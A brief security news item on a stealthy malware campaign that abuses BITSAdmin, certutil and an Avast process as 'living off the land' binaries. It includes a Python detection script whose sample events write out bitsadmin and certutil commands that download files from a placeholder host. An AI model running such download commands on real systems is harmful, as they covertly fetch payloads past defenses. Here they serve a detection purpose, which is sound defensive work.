Extensive ‘Living Off the Land’ Hides Stealthy Malware Campaign

February 13, 2019

The latest campaign, discovered by the Cybereason Nocturnus Research team, uses an evolved variant of the malware that goes to great lengths to remain stealthy in what is described as a ‘massive spam campaign’. In a blog report published today, Cybereason has noted four major differences from earlier variants.

Firstly, this variant exclusively uses BITSAdmin (as used in the latest-reported APT10 attacks) to download the payload. Earlier versions used Windows’ certificate management tool, certutil.

Secondly, in a major and effective move, the latest version uses, rather than evades, the Avast anti-malware product. Earlier versions simply stopped if Avast was present; the latest version uses an Avast process as a LOLBin.
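The two download LOLBins named above (BITSAdmin in this variant, certutil in earlier ones) leave a distinctive process-creation trail. The following is an added detection example, not code from Cybereason or the report; it runs over constructed Sysmon-style process events (Image, CommandLine, ParentImage) and flags the remote-download invocations of each tool while leaving ordinary local usage alone. The Avast process used as a LOLBin is not named on this page, so it is not covered here.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 fields.
# These are illustrative records, not real telemetry; hosts are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer j1 /download /priority high http://example.invalid/p.bin C:\Users\Public\p.bin",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",          # benign: local cert check
     "CommandLine": r"certutil -verify C:\certs\server.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",         # benign: no remote transfer
     "CommandLine": r"bitsadmin /list /allusers",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# certutil accepts both "-urlcache" and "/urlcache"; match either form.
URLCACHE_RE = re.compile(r"[-/]urlcache", re.IGNORECASE)
# Script hosts spawning a downloader is the kind of parent seen in spam-delivered chains.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def classify(event):
    """Return a rule name when the event is a LOLBin download, else None."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if image.endswith("\\bitsadmin.exe") and "/transfer" in cmd.lower() and URL_RE.search(cmd):
        return "bitsadmin_remote_transfer"
    if image.endswith("\\certutil.exe") and URLCACHE_RE.search(cmd) and URL_RE.search(cmd):
        return "certutil_urlcache_download"
    return None


def scan(events):
    """Yield (rule, parent_basename, high_confidence, command_line) for each hit."""
    hits = []
    for e in events:
        rule = classify(e)
        if rule is None:
            continue
        parent = e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        hits.append((rule, parent, parent in SCRIPT_HOSTS, e["CommandLine"]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The rules key on the downloader invocation rather than on any payload name or URL, so they survive the kind of infrastructure rotation a spam campaign relies on; the script-host parent flag is context for triage, not a requirement for a hit.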

Read More on Security Week